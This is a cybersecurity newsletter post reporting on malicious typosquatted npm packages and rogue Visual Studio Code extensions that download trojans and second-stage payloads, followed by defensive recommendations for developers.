• Cyber Syrup
  • Posts
  • Malicious Typosquats Target npm Packages and Visual Studio Code Extensions

Malicious Typosquats Target npm Packages and Visual Studio Code Extensions

Threat actors have been actively uploading malicious typosquats of legitimate npm packages, such as typescript-eslint and @types/node, to the npm registry

In partnership with

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

Writer RAG tool: build production-ready RAG apps in minutes

  • Writer RAG Tool: build production-ready RAG apps in minutes with simple API calls.

  • Knowledge Graph integration for intelligent data retrieval and AI-powered interactions.

  • Streamlined full-stack platform eliminates complex setups for scalable, accurate AI workflows.

Malicious Typosquats Target npm Packages and Visual Studio Code Extensions

Threat actors have been actively uploading malicious typosquats of legitimate npm packages, such as typescript-eslint and @types/node, to the npm registry. These counterfeit packages, named @typescript_eslinter/eslint and types-node, are designed to download trojans and retrieve second-stage payloads, posing a significant threat to developers and organizations alike.

The Attack

Efforts to Mimic Legitimate Packages

According to an analysis by Sonatype's Ax Sharma, the effort invested by malicious actors to mimic legitimate packages is alarming. The npm packages in question have racked up thousands of downloads, suggesting that developers may have unintentionally fallen victim to these typosquats. In some cases, download counts may have been artificially inflated by threat actors to increase the perceived legitimacy of the malicious packages.

Malicious Packages and Their Behavior

@typescript_eslinter/eslint

  • Details:

    • Linked to a fake GitHub repository created on November 29, 2024, by an account named "typescript-eslinter."

    • Contains a file named prettier.bat, which is actually a Windows executable (.exe) flagged as a trojan and dropper on VirusTotal.

  • Behavior:

    • Installs itself into the Windows Startup folder to ensure it runs on every reboot.

types-node

  • Details:

    • Fetches malicious scripts from a Pastebin URL, which then execute a trojan masquerading as npm.exe.

Both packages were designed to exploit the trust developers place in widely-used open-source libraries.

Broader Campaign Targeting Visual Studio Code

Targeting VSCode Extensions

In addition to npm packages, threat actors have targeted the Visual Studio Code (VSCode) Marketplace. ReversingLabs identified several malicious extensions uploaded to the marketplace in October 2024. These extensions impersonated tools for blockchain development and video conferencing applications like Zoom.

Malicious VSCode Extensions

The following rogue VSCode extensions, now removed, were part of this campaign:

  • EVM.Blockchain-Toolkit

  • VoiceMod.VoiceMod

  • ZoomVideoCommunications.Zoom

  • Ethereum.SoliditySupport

  • SolidityFoundation.Solidity-Ethereum

  • GavinWood.SolidityLang

  • And others.

Behavior

These extensions included obfuscated JavaScript code designed to download second-stage payloads from remote servers. The final payload remains unknown, but the evolving sophistication of these extensions underscores a deliberate effort to compromise developers’ environments.

Implications for Developers and Organizations

Threat to Supply Chain Security

The attack highlights vulnerabilities in open-source ecosystems and integrated development environments (IDEs). The inclusion of malicious code as a dependency can compromise not only individual developers but also the broader development and operational pipelines within enterprises.

Potential for Enterprise Compromise

Compromising an IDE or a widely-used package repository could serve as a foothold for attackers to infiltrate corporate systems, steal sensitive data, or disrupt critical business operations.

Recommendations for Protection

To mitigate these risks, developers and organizations should take the following steps:

  1. Verify Package Authenticity

    • Double-check package names for typosquats and validate repositories before downloading.

    • Use tools like Sonatype’s Nexus and GitHub’s Dependabot to monitor dependencies for vulnerabilities.

  2. Enable Code Scanning

    • Employ automated tools to analyze packages and extensions for malicious or obfuscated code.

  3. Implement Multi-Factor Authentication (MFA)

    • Secure developer accounts on platforms like npm, GitHub, and IDE marketplaces with MFA to prevent unauthorized access.

  4. Restrict IDE Extensions

    • Limit the installation of extensions to verified publishers. Regularly audit installed extensions for unusual behavior.

  5. Adopt Secure Development Practices

    • Use sandboxed environments to test third-party tools and dependencies before integrating them into projects.

Conclusion

The recent typosquatting and VSCode extension attacks highlight the growing sophistication of threat actors targeting the software development lifecycle. By masquerading as trusted tools, these campaigns aim to introduce malicious code into developer environments, potentially affecting millions of users downstream.

Developers and organizations must prioritize robust security measures and remain vigilant to safeguard their projects and systems from supply chain threats. As the open-source ecosystem continues to grow, so does the need for proactive defenses to combat malicious activities.